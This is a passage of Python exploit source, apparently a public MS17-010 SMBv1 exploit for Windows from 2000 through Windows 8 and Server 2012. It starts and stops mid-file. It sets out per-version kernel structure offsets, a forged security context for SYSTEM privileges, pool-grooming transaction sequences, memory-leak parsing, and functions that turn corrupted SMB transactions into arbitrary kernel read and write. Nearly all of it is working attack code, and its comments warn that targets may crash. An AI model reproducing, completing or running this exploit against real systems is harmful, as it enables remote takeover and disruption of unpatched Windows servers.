 69 |     DWORD ImpersonationLevel; // 0x18
 70 |     DWORD xx4;
 71 |     BOOLEAN UsePsImpersonateClient; // 0x20
 72 | }
 73 | win2012 x64
 74 | struct SrvSecContext {
 75 |     DWORD xx1; // second WORD is size
 76 |     DWORD refCnt;
 77 |     QWORD xx2;
 78 |     QWORD xx3;
 79 |     PACCESS_TOKEN Token;  // 0x18
 80 |     DWORD xx4;
 81 |     BOOLEAN CopyOnOpen; // 0x24
 82 |     BOOLEAN EffectiveOnly;
 83 |     WORD xx3;
 84 |     DWORD ImpersonationLevel; // 0x28
 85 |     DWORD xx4;
 86 |     BOOLEAN UsePsImpersonateClient; // 0x30
 87 | }
 88 |  
 89 | SrvImpersonateSecurityContext() is used in Windows Vista and later before doing any operation as logged on user.
 90 | It called PsImperonateClient() if SrvSecContext.UsePsImpersonateClient is true. 
 91 | From https://msdn.microsoft.com/en-us/library/windows/hardware/ff551907(v=vs.85).aspx, if Token is NULL,
 92 | PsImperonateClient() ends the impersonation. Even there is no impersonation, the PsImperonateClient() returns
 93 | STATUS_SUCCESS when Token is NULL.
 94 | If we can overwrite Token to NULL and UsePsImpersonateClient to true, a running thread will use primary token (SYSTEM)
 95 | to do all SMB operations.
 96 | Note: for Windows 2003 and earlier, the exploit modify token user and groups in PCtxtHandle to get SYSTEM because only
 97 |   ImpersonateSecurityContext() is used in these Windows versions.
 98 | '''
 99 | ###########################
100 | # info for modify session security context
101 | ###########################
102 | WIN7_64_SESSION_INFO = {
103 |     'SESSION_SECCTX_OFFSET': 0xa0,
104 |     'SESSION_ISNULL_OFFSET': 0xba,
105 |     'FAKE_SECCTX': pack('<IIQQIIB', 0x28022a, 1, 0, 0, 2, 0, 1),
106 |     'SECCTX_SIZE': 0x28,
107 | }
108 |  
109 | WIN7_32_SESSION_INFO = {
110 |     'SESSION_SECCTX_OFFSET': 0x80,
111 |     'SESSION_ISNULL_OFFSET': 0x96,
112 |     'FAKE_SECCTX': pack('<IIIIIIB', 0x1c022a, 1, 0, 0, 2, 0, 1),
113 |     'SECCTX_SIZE': 0x1c,
114 | }
115 |  
116 | # win8+ info
117 | WIN8_64_SESSION_INFO = {
118 |     'SESSION_SECCTX_OFFSET': 0xb0,
119 |     'SESSION_ISNULL_OFFSET': 0xca,
120 |     'FAKE_SECCTX': pack('<IIQQQQIIB', 0x38022a, 1, 0, 0, 0, 0, 2, 0, 1),
121 |     'SECCTX_SIZE': 0x38,
122 | }
123 |  
124 | WIN8_32_SESSION_INFO = {
125 |     'SESSION_SECCTX_OFFSET': 0x88,
126 |     'SESSION_ISNULL_OFFSET': 0x9e,
127 |     'FAKE_SECCTX': pack('<IIIIIIIIB', 0x24022a, 1, 0, 0, 0, 0, 2, 0, 1),
128 |     'SECCTX_SIZE': 0x24,
129 | }
130 |  
131 | # win 2003 (xp 64 bit is win 2003)
132 | WIN2K3_64_SESSION_INFO = {
133 |     'SESSION_ISNULL_OFFSET': 0xba,
134 |     'SESSION_SECCTX_OFFSET': 0xa0,  # Win2k3 has another struct to keep PCtxtHandle (similar to 2008+)
135 |     'SECCTX_PCTXTHANDLE_OFFSET': 0x10,  # PCtxtHandle is at offset 0x8 but only upperPart is needed
136 |     'PCTXTHANDLE_TOKEN_OFFSET': 0x40,
137 |     'TOKEN_USER_GROUP_CNT_OFFSET': 0x4c,
138 |     'TOKEN_USER_GROUP_ADDR_OFFSET': 0x68,
139 | }
140 |  
141 | WIN2K3_32_SESSION_INFO = {
142 |     'SESSION_ISNULL_OFFSET': 0x96,
143 |     'SESSION_SECCTX_OFFSET': 0x80,  # Win2k3 has another struct to keep PCtxtHandle (similar to 2008+)
144 |     'SECCTX_PCTXTHANDLE_OFFSET': 0xc,  # PCtxtHandle is at offset 0x8 but only upperPart is needed
145 |     'PCTXTHANDLE_TOKEN_OFFSET': 0x24,
146 |     'TOKEN_USER_GROUP_CNT_OFFSET': 0x4c,
147 |     'TOKEN_USER_GROUP_ADDR_OFFSET': 0x68,
148 | }
149 |  
150 | # win xp
151 | WINXP_32_SESSION_INFO = {
152 |     'SESSION_ISNULL_OFFSET': 0x94,
153 |     'SESSION_SECCTX_OFFSET': 0x84,  # PCtxtHandle is at offset 0x80 but only upperPart is needed
154 |     'PCTXTHANDLE_TOKEN_OFFSET': 0x24,
155 |     'TOKEN_USER_GROUP_CNT_OFFSET': 0x4c,
156 |     'TOKEN_USER_GROUP_ADDR_OFFSET': 0x68,
157 | }
158 |  
159 | WIN2K_32_SESSION_INFO = {
160 |     'SESSION_ISNULL_OFFSET': 0x94,
161 |     'SESSION_SECCTX_OFFSET': 0x84,  # PCtxtHandle is at offset 0x80 but only upperPart is needed
162 |     'PCTXTHANDLE_TOKEN_OFFSET': 0x24,
163 |     'TOKEN_USER_GROUP_CNT_OFFSET': 0x3c,
164 |     'TOKEN_USER_GROUP_ADDR_OFFSET': 0x58,
165 | }
166 |  
167 | ###########################
168 | # info for exploitation
169 | ###########################
170 | # for windows 2008+
171 | WIN7_32_TRANS_INFO = {
172 |     'TRANS_SIZE' : 0xa0,  # struct size
173 |     'TRANS_FLINK_OFFSET' : 0x18,
174 |     'TRANS_INPARAM_OFFSET' : 0x40,
175 |     'TRANS_OUTPARAM_OFFSET' : 0x44,
176 |     'TRANS_INDATA_OFFSET' : 0x48,
177 |     'TRANS_OUTDATA_OFFSET' : 0x4c,
178 |     'TRANS_PARAMCNT_OFFSET' : 0x58,
179 |     'TRANS_TOTALPARAMCNT_OFFSET' : 0x5c,
180 |     'TRANS_FUNCTION_OFFSET' : 0x72,
181 |     'TRANS_MID_OFFSET' : 0x80,
182 | }
183 |  
184 | WIN7_64_TRANS_INFO = {
185 |     'TRANS_SIZE' : 0xf8,  # struct size
186 |     'TRANS_FLINK_OFFSET' : 0x28,
187 |     'TRANS_INPARAM_OFFSET' : 0x70,
188 |     'TRANS_OUTPARAM_OFFSET' : 0x78,
189 |     'TRANS_INDATA_OFFSET' : 0x80,
190 |     'TRANS_OUTDATA_OFFSET' : 0x88,
191 |     'TRANS_PARAMCNT_OFFSET' : 0x98,
192 |     'TRANS_TOTALPARAMCNT_OFFSET' : 0x9c,
193 |     'TRANS_FUNCTION_OFFSET' : 0xb2,
194 |     'TRANS_MID_OFFSET' : 0xc0,
195 | }
196 |  
197 | WIN5_32_TRANS_INFO = {
198 |     'TRANS_SIZE' : 0x98,  # struct size
199 |     'TRANS_FLINK_OFFSET' : 0x18,
200 |     'TRANS_INPARAM_OFFSET' : 0x3c,
201 |     'TRANS_OUTPARAM_OFFSET' : 0x40,
202 |     'TRANS_INDATA_OFFSET' : 0x44,
203 |     'TRANS_OUTDATA_OFFSET' : 0x48,
204 |     'TRANS_PARAMCNT_OFFSET' : 0x54,
205 |     'TRANS_TOTALPARAMCNT_OFFSET' : 0x58,
206 |     'TRANS_FUNCTION_OFFSET' : 0x6e,
207 |     'TRANS_PID_OFFSET' : 0x78,
208 |     'TRANS_MID_OFFSET' : 0x7c,
209 | }
210 |  
211 | WIN5_64_TRANS_INFO = {
212 |     'TRANS_SIZE' : 0xe0,  # struct size
213 |     'TRANS_FLINK_OFFSET' : 0x28,
214 |     'TRANS_INPARAM_OFFSET' : 0x68,
215 |     'TRANS_OUTPARAM_OFFSET' : 0x70,
216 |     'TRANS_INDATA_OFFSET' : 0x78,
217 |     'TRANS_OUTDATA_OFFSET' : 0x80,
218 |     'TRANS_PARAMCNT_OFFSET' : 0x90,
219 |     'TRANS_TOTALPARAMCNT_OFFSET' : 0x94,
220 |     'TRANS_FUNCTION_OFFSET' : 0xaa,
221 |     'TRANS_PID_OFFSET' : 0xb4,
222 |     'TRANS_MID_OFFSET' : 0xb8,
223 | }
224 |  
225 | X86_INFO = {
226 |     'ARCH' : 'x86',
227 |     'PTR_SIZE' : 4,
228 |     'PTR_FMT' : 'I',
229 |     'FRAG_TAG_OFFSET' : 12,
230 |     'POOL_ALIGN' : 8,
231 |     'SRV_BUFHDR_SIZE' : 8,
232 | }
233 |  
234 | X64_INFO = {
235 |     'ARCH' : 'x64',
236 |     'PTR_SIZE' : 8,
237 |     'PTR_FMT' : 'Q',
238 |     'FRAG_TAG_OFFSET' : 0x14,
239 |     'POOL_ALIGN' : 0x10,
240 |     'SRV_BUFHDR_SIZE' : 0x10,
241 | }
242 |  
243 | def merge_dicts(*dict_args):
244 |     result = {}
245 |     for dictionary in dict_args:
246 |         result.update(dictionary)
247 |     return result
248 |  
249 | OS_ARCH_INFO = {
250 |     # for Windows Vista, 2008, 7 and 2008 R2
251 |     'WIN7': {
252 |         'x86': merge_dicts(X86_INFO, WIN7_32_TRANS_INFO, WIN7_32_SESSION_INFO),
253 |         'x64': merge_dicts(X64_INFO, WIN7_64_TRANS_INFO, WIN7_64_SESSION_INFO),
254 |     },
255 |     # for Windows 8 and later
256 |     'WIN8': {
257 |         'x86': merge_dicts(X86_INFO, WIN7_32_TRANS_INFO, WIN8_32_SESSION_INFO),
258 |         'x64': merge_dicts(X64_INFO, WIN7_64_TRANS_INFO, WIN8_64_SESSION_INFO),
259 |     },
260 |     'WINXP': {
261 |         'x86': merge_dicts(X86_INFO, WIN5_32_TRANS_INFO, WINXP_32_SESSION_INFO),
262 |         'x64': merge_dicts(X64_INFO, WIN5_64_TRANS_INFO, WIN2K3_64_SESSION_INFO),
263 |     },
264 |     'WIN2K3': {
265 |         'x86': merge_dicts(X86_INFO, WIN5_32_TRANS_INFO, WIN2K3_32_SESSION_INFO),
266 |         'x64': merge_dicts(X64_INFO, WIN5_64_TRANS_INFO, WIN2K3_64_SESSION_INFO),
267 |     },
268 |     'WIN2K': {
269 |         'x86': merge_dicts(X86_INFO, WIN5_32_TRANS_INFO, WIN2K_32_SESSION_INFO),
270 |     },
271 | }
272 |  
273 |  
274 | TRANS_NAME_LEN = 4
275 | HEAP_HDR_SIZE = 8  # heap chunk header size
276 |  
277 |  
278 | def calc_alloc_size(size, align_size):
279 |     return (size + align_size - 1) & ~(align_size-1)
280 |  
281 | def wait_for_request_processed(conn):
282 |     #time.sleep(0.05)
283 |     # send echo is faster than sleep(0.05) when connection is very good
284 |     conn.send_echo('a')
285 |  
286 | def find_named_pipe(conn):
287 |     pipes = [ 'browser', 'spoolss', 'netlogon', 'lsarpc', 'samr' ]
288 |      
289 |     tid = conn.tree_connect_andx('\\\\'+conn.get_remote_host()+'\\'+'IPC$')
290 |     found_pipe = None
291 |     for pipe in pipes:
292 |         try:
293 |             fid = conn.nt_create_andx(tid, pipe)
294 |             conn.close(tid, fid)
295 |             found_pipe = pipe
296 |         except smb.SessionError as e:
297 |             pass
298 |      
299 |     conn.disconnect_tree(tid)
300 |     return found_pipe
301 |  
302 |  
303 | special_mid = 0
304 | extra_last_mid = 0
305 | def reset_extra_mid(conn):
306 |     global extra_last_mid, special_mid
307 |     special_mid = (conn.next_mid() & 0xff00) - 0x100
308 |     extra_last_mid = special_mid
309 |      
310 | def next_extra_mid():
311 |     global extra_last_mid
312 |     extra_last_mid += 1
313 |     return extra_last_mid
314 |  
315 |  
316 | # Borrow 'groom' and 'bride' word from NSA tool
317 | # GROOM_TRANS_SIZE includes transaction name, parameters and data
318 | # Note: the GROOM_TRANS_SIZE size MUST be multiple of 16 to make FRAG_TAG_OFFSET valid
319 | GROOM_TRANS_SIZE = 0x5010
320 |  
321 | def leak_frag_size(conn, tid, fid):
322 |     # this method can be used on Windows Vista/2008 and later
323 |     # leak "Frag" pool size and determine target architecture
324 |     info = {}
325 |      
326 |     # A "Frag" pool is placed after the large pool allocation if last page has some free space left.
327 |     # A "Frag" pool size (on 64-bit) is 0x10 or 0x20 depended on Windows version.
328 |     # To make exploit more generic, exploit does info leak to find a "Frag" pool size.
329 |     # From the leak info, we can determine the target architecture too.
330 |     mid = conn.next_mid()
331 |     req1 = conn.create_nt_trans_packet(5, param=pack('<HH', fid, 0), mid=mid, data='A'*0x10d0, maxParameterCount=GROOM_TRANS_SIZE-0x10d0-TRANS_NAME_LEN)
332 |     req2 = conn.create_nt_trans_secondary_packet(mid, data='B'*276) # leak more 276 bytes
333 |      
334 |     conn.send_raw(req1[:-8])
335 |     conn.send_raw(req1[-8:]+req2)
336 |     leakData = conn.recv_transaction_data(mid, 0x10d0+276)
337 |     leakData = leakData[0x10d4:]  # skip parameters and its own input
338 |     # Detect target architecture and calculate frag pool size
339 |     if leakData[X86_INFO['FRAG_TAG_OFFSET']:X86_INFO['FRAG_TAG_OFFSET']+4] == 'Frag':
340 |         print('Target is 32 bit')
341 |         info['arch'] = 'x86'
342 |         info['FRAG_POOL_SIZE'] = ord(leakData[ X86_INFO['FRAG_TAG_OFFSET']-2 ]) * X86_INFO['POOL_ALIGN']
343 |     elif leakData[X64_INFO['FRAG_TAG_OFFSET']:X64_INFO['FRAG_TAG_OFFSET']+4] == 'Frag':
344 |         print('Target is 64 bit')
345 |         info['arch'] = 'x64'
346 |         info['FRAG_POOL_SIZE'] = ord(leakData[ X64_INFO['FRAG_TAG_OFFSET']-2 ]) * X64_INFO['POOL_ALIGN']
347 |     else:
348 |         print('Not found Frag pool tag in leak data')
349 |         sys.exit()
350 |      
351 |     print('Got frag size: 0x{:x}'.format(info['FRAG_POOL_SIZE']))
352 |     return info
353 |  
354 |  
355 | def read_data(conn, info, read_addr, read_size):
356 |     fmt = info['PTR_FMT']
357 |     # modify trans2.OutParameter to leak next transaction and trans2.OutData to leak real data
358 |     # modify trans2.*ParameterCount and trans2.*DataCount to limit data
359 |     new_data = pack('<'+fmt*3, info['trans2_addr']+info['TRANS_FLINK_OFFSET'], info['trans2_addr']+0x200, read_addr)  # OutParameter, InData, OutData
360 |     new_data += pack('<II', 0, 0)  # SetupCount, MaxSetupCount
361 |     new_data += pack('<III', 8, 8, 8)  # ParamterCount, TotalParamterCount, MaxParameterCount
362 |     new_data += pack('<III', read_size, read_size, read_size)  # DataCount, TotalDataCount, MaxDataCount
363 |     new_data += pack('<HH', 0, 5)  # Category, Function (NT_RENAME)
364 |     conn.send_nt_trans_secondary(mid=info['trans1_mid'], data=new_data, dataDisplacement=info['TRANS_OUTPARAM_OFFSET'])
365 |      
366 |     # create one more transaction before leaking data
367 |     # - next transaction can be used for arbitrary read/write after the current trans2 is done
368 |     # - next transaction address is from TransactionListEntry.Flink value
369 |     conn.send_nt_trans(5, param=pack('<HH', info['fid'], 0), totalDataCount=0x4300-0x20, totalParameterCount=0x1000)
370 |  
371 |     # finish the trans2 to leak
372 |     conn.send_nt_trans_secondary(mid=info['trans2_mid'])
373 |     read_data = conn.recv_transaction_data(info['trans2_mid'], 8+read_size)
374 |      
375 |     # set new trans2 address
376 |     info['trans2_addr'] = unpack_from('<'+fmt, read_data)[0] - info['TRANS_FLINK_OFFSET']
377 |      
378 |     # set trans1.InData to &trans2
379 |     conn.send_nt_trans_secondary(mid=info['trans1_mid'], param=pack('<'+fmt, info['trans2_addr']), paramDisplacement=info['TRANS_INDATA_OFFSET'])
380 |     wait_for_request_processed(conn)
381 |  
382 |     # modify trans2 mid
383 |     conn.send_nt_trans_secondary(mid=info['trans1_mid'], data=pack('<H', info['trans2_mid']), dataDisplacement=info['TRANS_MID_OFFSET'])
384 |     wait_for_request_processed(conn)
385 |      
386 |     return read_data[8:]  # no need to return parameter
387 |  
388 | def write_data(conn, info, write_addr, write_data):
389 |     # trans2.InData
390 |     conn.send_nt_trans_secondary(mid=info['trans1_mid'], data=pack('<'+info['PTR_FMT'], write_addr), dataDisplacement=info['TRANS_INDATA_OFFSET'])
391 |     wait_for_request_processed(conn)
392 |      
393 |     # write data
394 |     conn.send_nt_trans_secondary(mid=info['trans2_mid'], data=write_data)
395 |     wait_for_request_processed(conn)
396 |  
397 |  
398 | def align_transaction_and_leak(conn, tid, fid, info, numFill=4):
399 |     trans_param = pack('<HH', fid, 0)  # param for NT_RENAME
400 |     # fill large pagedpool holes (maybe no need)
401 |     for i in range(numFill):
402 |         conn.send_nt_trans(5, param=trans_param, totalDataCount=0x10d0, maxParameterCount=GROOM_TRANS_SIZE-0x10d0)
403 |  
404 |     mid_ntrename = conn.next_mid()
405 |     # first GROOM, for leaking next BRIDE transaction
406 |     req1 = conn.create_nt_trans_packet(5, param=trans_param, mid=mid_ntrename, data='A'*0x10d0, maxParameterCount=info['GROOM_DATA_SIZE']-0x10d0)
407 |     req2 = conn.create_nt_trans_secondary_packet(mid_ntrename, data='B'*276) # leak more 276 bytes
408 |     # second GROOM, for controlling next BRIDE transaction
409 |     req3 = conn.create_nt_trans_packet(5, param=trans_param, mid=fid, totalDataCount=info['GROOM_DATA_SIZE']-0x1000, maxParameterCount=0x1000)
410 |     # many BRIDEs, expect two of them are allocated at splitted pool from GROOM
411 |     reqs = []
412 |     for i in range(12):
413 |         mid = next_extra_mid()
414 |         reqs.append(conn.create_trans_packet('', mid=mid, param=trans_param, totalDataCount=info['BRIDE_DATA_SIZE']-0x200, totalParameterCount=0x200, maxDataCount=0, maxParameterCount=0))
415 |  
416 |     conn.send_raw(req1[:-8])
417 |     conn.send_raw(req1[-8:]+req2+req3+''.join(reqs))
418 |      
419 |     # expected transactions alignment ("Frag" pool is not shown)
420 |     #
421 |     #    |         5 * PAGE_SIZE         |   PAGE_SIZE    |         5 * PAGE_SIZE         |   PAGE_SIZE    |
422 |     #    +-------------------------------+----------------+-------------------------------+----------------+
423 |     #    |    GROOM mid=mid_ntrename        |  extra_mid1 |         GROOM mid=fid            |  extra_mid2 |
424 |     #    +-------------------------------+----------------+-------------------------------+----------------+
425 |     #
426 |     # If transactions are aligned as we expected, BRIDE transaction with mid=extra_mid1 will be leaked.
427 |     # From leaked transaction, we get
428 |     # - leaked transaction address from InParameter or InData
429 |     # - transaction, with mid=extra_mid2, address from LIST_ENTRY.Flink
430 |     # With these information, we can verify the transaction aligment from displacement.
431 |  
432 |     leakData = conn.recv_transaction_data(mid_ntrename, 0x10d0+276)
433 |     leakData = leakData[0x10d4:]  # skip parameters and its own input
434 |     #open('leak.dat', 'wb').write(leakData)
435 |  
436 |     if leakData[info['FRAG_TAG_OFFSET']:info['FRAG_TAG_OFFSET']+4] != 'Frag':
437 |         print('Not found Frag pool tag in leak data')
438 |         return None
439 |      
440 |     # ================================
441 |     # verify leak data
442 |     # ================================
443 |     leakData = leakData[info['FRAG_TAG_OFFSET']-4+info['FRAG_POOL_SIZE']:]
444 |     # check pool tag and size value in buffer header
445 |     expected_size = pack('<H', info['BRIDE_TRANS_SIZE'])
446 |     leakTransOffset = info['POOL_ALIGN'] + info['SRV_BUFHDR_SIZE']
447 |     if leakData[0x4:0x8] != 'LStr' or leakData[info['POOL_ALIGN']:info['POOL_ALIGN']+2] != expected_size or leakData[leakTransOffset+2:leakTransOffset+4] != expected_size:
448 |         print('No transaction struct in leak data')
449 |         return None
450 |  
451 |     leakTrans = leakData[leakTransOffset:]
452 |  
453 |     ptrf = info['PTR_FMT']
454 |     _, connection_addr, session_addr, treeconnect_addr, flink_value = unpack_from('<'+ptrf*5, leakTrans, 8)
455 |     inparam_value = unpack_from('<'+ptrf, leakTrans, info['TRANS_INPARAM_OFFSET'])[0]
456 |     leak_mid = unpack_from('<H', leakTrans, info['TRANS_MID_OFFSET'])[0]
457 |  
458 |     print('CONNECTION: 0x{:x}'.format(connection_addr))
459 |     print('SESSION: 0x{:x}'.format(session_addr))
460 |     print('FLINK: 0x{:x}'.format(flink_value))
461 |     print('InParam: 0x{:x}'.format(inparam_value))
462 |     print('MID: 0x{:x}'.format(leak_mid))
463 |  
464 |     next_page_addr = (inparam_value & 0xfffffffffffff000) + 0x1000
465 |     if next_page_addr + info['GROOM_POOL_SIZE'] + info['FRAG_POOL_SIZE'] + info['POOL_ALIGN'] + info['SRV_BUFHDR_SIZE'] + info['TRANS_FLINK_OFFSET'] != flink_value:
466 |         print('unexpected alignment, diff: 0x{:x}'.format(flink_value - next_page_addr))
467 |         return None
468 |     # trans1: leak transaction
469 |     # trans2: next transaction
470 |     return {
471 |         'connection': connection_addr,
472 |         'session': session_addr,
473 |         'next_page_addr': next_page_addr,
474 |         'trans1_mid': leak_mid,
475 |         'trans1_addr': inparam_value - info['TRANS_SIZE'] - TRANS_NAME_LEN,
476 |         'trans2_addr': flink_value - info['TRANS_FLINK_OFFSET'],
477 |     }
478 |  
479 | def exploit_matched_pairs(conn, pipe_name, info):
480 |     # for Windows 7/2008 R2 and later
481 |      
482 |     tid = conn.tree_connect_andx('\\\\'+conn.get_remote_host()+'\\'+'IPC$')
483 |     conn.set_default_tid(tid)
484 |     # fid for first open is always 0x4000. We can open named pipe multiple times to get other fids.
485 |     fid = conn.nt_create_andx(tid, pipe_name)
486 |      
487 |     info.update(leak_frag_size(conn, tid, fid))
488 |     # add os and arch specific exploit info
489 |     info.update(OS_ARCH_INFO[info['os']][info['arch']])
490 |      
491 |     # groom: srv buffer header
492 |     info['GROOM_POOL_SIZE'] = calc_alloc_size(GROOM_TRANS_SIZE + info['SRV_BUFHDR_SIZE'] + info['POOL_ALIGN'], info['POOL_ALIGN'])
493 |     print('GROOM_POOL_SIZE: 0x{:x}'.format(info['GROOM_POOL_SIZE']))
494 |     # groom paramters and data is alignment by 8 because it is NT_TRANS
495 |     info['GROOM_DATA_SIZE'] = GROOM_TRANS_SIZE - TRANS_NAME_LEN - 4 - info['TRANS_SIZE']  # alignment (4)
496 |  
497 |     # bride: srv buffer header, pool header (same as pool align size), empty transaction name (4)
498 |     bridePoolSize = 0x1000 - (info['GROOM_POOL_SIZE'] & 0xfff) - info['FRAG_POOL_SIZE']
499 |     info['BRIDE_TRANS_SIZE'] = bridePoolSize - (info['SRV_BUFHDR_SIZE'] + info['POOL_ALIGN'])
500 |     print('BRIDE_TRANS_SIZE: 0x{:x}'.format(info['BRIDE_TRANS_SIZE']))
501 |     # bride paramters and data is alignment by 4 because it is TRANS
502 |     info['BRIDE_DATA_SIZE'] = info['BRIDE_TRANS_SIZE'] - TRANS_NAME_LEN - info['TRANS_SIZE']
503 |      
504 |     # ================================
505 |     # try align pagedpool and leak info until satisfy
506 |     # ================================
507 |     leakInfo = None
508 |     # max attempt: 10
509 |     for i in range(10):
510 |         reset_extra_mid(conn)
511 |         leakInfo = align_transaction_and_leak(conn, tid, fid, info)
512 |         if leakInfo is not None:
513 |             break
514 |         print('leak failed... try again')
515 |         conn.close(tid, fid)
516 |         conn.disconnect_tree(tid)
517 |          
518 |         tid = conn.tree_connect_andx('\\\\'+conn.get_remote_host()+'\\'+'IPC$')
519 |         conn.set_default_tid(tid)
520 |         fid = conn.nt_create_andx(tid, pipe_name)
521 |  
522 |     if leakInfo is None:
523 |         return False
524 |      
525 |     info['fid'] = fid
526 |     info.update(leakInfo)
527 |  
528 |     # ================================
529 |     # shift transGroom.Indata ptr with SmbWriteAndX
530 |     # ================================
531 |     shift_indata_byte = 0x200
532 |     conn.do_write_andx_raw_pipe(fid, 'A'*shift_indata_byte)
533 |  
534 |     # Note: Even the distance between bride transaction is exactly what we want, the groom transaction might be in a wrong place.
535 |     #       So the below operation is still dangerous. Write only 1 byte with '\x00' might be safe even alignment is wrong.
536 |     # maxParameterCount (0x1000), trans name (4), param (4)
537 |     indata_value = info['next_page_addr'] + info['TRANS_SIZE'] + 8 + info['SRV_BUFHDR_SIZE'] + 0x1000 + shift_indata_byte
538 |     indata_next_trans_displacement = info['trans2_addr'] - indata_value
539 |     conn.send_nt_trans_secondary(mid=fid, data='\x00', dataDisplacement=indata_next_trans_displacement + info['TRANS_MID_OFFSET'])
540 |     wait_for_request_processed(conn)
541 |  
542 |     # if the overwritten is correct, a modified transaction mid should be special_mid now.
543 |     # a new transaction with special_mid should be error.
544 |     recvPkt = conn.send_nt_trans(5, mid=special_mid, param=pack('<HH', fid, 0), data='')
545 |     if recvPkt.getNTStatus() != 0x10002:  # invalid SMB
546 |         print('unexpected return status: 0x{:x}'.format(recvPkt.getNTStatus()))
547 |         print('!!! Write to wrong place !!!')
548 |         print('the target might be crashed')
549 |         return False
550 |  
551 |     print('success controlling groom transaction')
552 |  
553 |     # NSA exploit set refCnt on leaked transaction to very large number for reading data repeatly
554 |     # but this method make the transation never get freed
555 |     # I will avoid memory leak
556 |      
557 |     # ================================
558 |     # modify trans1 struct to be used for arbitrary read/write
559 |     # ================================
560 |     print('modify trans1 struct for arbitrary read/write')
561 |     fmt = info['PTR_FMT']
562 |     # use transGroom to modify trans2.InData to &trans1. so we can modify trans1 with trans2 data
563 |     conn.send_nt_trans_secondary(mid=fid, data=pack('<'+fmt, info['trans1_addr']), dataDisplacement=indata_next_trans_displacement + info['TRANS_INDATA_OFFSET'])
564 |     wait_for_request_processed(conn)
565 |  
566 |     # modify
567 |     # - trans1.InParameter to &trans1. so we can modify trans1 struct with itself (trans1 param)
568 |     # - trans1.InData to &trans2. so we can modify trans2 with trans1 data
569 |     conn.send_nt_trans_secondary(mid=special_mid, data=pack('<'+fmt*3, info['trans1_addr'], info['trans1_addr']+0x200, info['trans2_addr']), dataDisplacement=info['TRANS_INPARAM_OFFSET'])
570 |     wait_for_request_processed(conn)
571 |  
572 |     # modify trans2.mid
573 |     info['trans2_mid'] = conn.next_mid()
574 |     conn.send_nt_trans_secondary(mid=info['trans1_mid'], data=pack('<H', info['trans2_mid']), dataDisplacement=info['TRANS_MID_OFFSET'])
575 |     return True
576 |  
577 | def exploit_fish_barrel(conn, pipe_name, info):
578 |     # for Windows Vista/2008 and earlier
579 |      
580 |     tid = conn.tree_connect_andx('\\\\'+conn.get_remote_host()+'\\'+'IPC$')
581 |     conn.set_default_tid(tid)
582 |     # fid for first open is always 0x4000. We can open named pipe multiple times to get other fids.
583 |     fid = conn.nt_create_andx(tid, pipe_name)
584 |     info['fid'] = fid
585 |  
586 |     if info['os'] == 'WIN7' and 'arch' not in info:
587 |         # leak_frag_size() can be used against Windows Vista/2008 to determine target architecture
588 |         info.update(leak_frag_size(conn, tid, fid))
589 |      
590 |     if 'arch' in info:
591 |         # add os and arch specific exploit info
592 |         info.update(OS_ARCH_INFO[info['os']][info['arch']])
593 |         attempt_list = [ OS_ARCH_INFO[info['os']][info['arch']] ]
594 |     else:
595 |         # do not know target architecture
596 |         # this case is only for Windows 2003
597 |         # try offset of 64 bit then 32 bit because no target architecture
598 |         attempt_list = [ OS_ARCH_INFO[info['os']]['x64'], OS_ARCH_INFO[info['os']]['x86'] ]
599 |      
600 |     # ================================
601 |     # groom packets
602 |     # ================================
603 |     # sum of transaction name, parameters and data length is 0x1000
604 |     # paramterCount = 0x100-TRANS_NAME_LEN
605 |     print('Groom packets')
606 |     trans_param = pack('<HH', info['fid'], 0)
607 |     for i in range(12):
608 |         mid = info['fid'] if i == 8 else next_extra_mid()
609 |         conn.send_trans('', mid=mid, param=trans_param, totalParameterCount=0x100-TRANS_NAME_LEN, totalDataCount=0xec0, maxParameterCount=0x40, maxDataCount=0) 
610 |      
611 |     # expected transactions alignment
612 |     #
613 |     #    +-----------+-----------+-----...-----+-----------+-----------+-----------+-----------+-----------+
614 |     #    |  mid=mid1 |  mid=mid2 |             |  mid=mid8 |  mid=fid  |  mid=mid9 | mid=mid10 | mid=mid11 |
615 |     #    +-----------+-----------+-----...-----+-----------+-----------+-----------+-----------+-----------+
616 |     #                                                         trans1       trans2
617 |  
618 |     # ================================
619 |     # shift transaction Indata ptr with SmbWriteAndX
620 |     # ================================
621 |     shift_indata_byte = 0x200
622 |     conn.do_write_andx_raw_pipe(info['fid'], 'A'*shift_indata_byte)
623 |      
624 |     # ================================
625 |     # Dangerous operation: attempt to control one transaction
626 |     # ================================
627 |     # Note: POOL_ALIGN value is same as heap alignment value
628 |     success = False
629 |     for tinfo in attempt_list:
630 |         print('attempt controlling next transaction on ' + tinfo['ARCH'])
631 |         HEAP_CHUNK_PAD_SIZE = (tinfo['POOL_ALIGN'] - (tinfo['TRANS_SIZE']+HEAP_HDR_SIZE) % tinfo['POOL_ALIGN']) % tinfo['POOL_ALIGN']
632 |         NEXT_TRANS_OFFSET = 0xf00 - shift_indata_byte + HEAP_CHUNK_PAD_SIZE + HEAP_HDR_SIZE
633 |  
634 |         # Below operation is dangerous. Write only 1 byte with '\x00' might be safe even alignment is wrong.
635 |         conn.send_trans_secondary(mid=info['fid'], data='\x00', dataDisplacement=NEXT_TRANS_OFFSET+tinfo['TRANS_MID_OFFSET'])
636 |         wait_for_request_processed(conn)
637 |  
638 |         # if the overwritten is correct, a modified transaction mid should be special_mid now.
639 |         # a new transaction with special_mid should be error.
640 |         recvPkt = conn.send_nt_trans(5, mid=special_mid, param=trans_param, data='')
641 |         if recvPkt.getNTStatus() == 0x10002:  # invalid SMB
642 |             print('success controlling one transaction')
643 |             success = True
644 |             if 'arch' not in info:
645 |                 print('Target is '+tinfo['ARCH'])
646 |                 info['arch'] = tinfo['ARCH']
647 |                 info.update(OS_ARCH_INFO[info['os']][info['arch']])
648 |             break
649 |         if recvPkt.getNTStatus() != 0:
650 |             print('unexpected return status: 0x{:x}'.format(recvPkt.getNTStatus()))
651 |      
652 |     if not success:
653 |         print('unexpected return status: 0x{:x}'.format(recvPkt.getNTStatus()))
654 |         print('!!! Write to wrong place !!!')
655 |         print('the target might be crashed')
656 |         return False
657 |  
658 |  
659 |     # NSA eternalromance modify transaction RefCount to keep controlled and reuse transaction after leaking info.
660 |     # This is easy to to but the modified transaction will never be freed. The next exploit attempt might be harder
661 |     #   because of this unfreed memory chunk. I will avoid it.
662 |      
663 |     # From a picture above, now we can only control trans2 by trans1 data. Also we know only offset of these two 
664 |     # transactions (do not know the address).
665 |     # After reading memory by modifying and completing trans2, trans2 cannot be used anymore.
666 |     # To be able to use trans1 after trans2 is gone, we need to modify trans1 to be able to modify itself.
667 |     # To be able to modify trans1 struct, we need to use trans2 param or data but write backward.
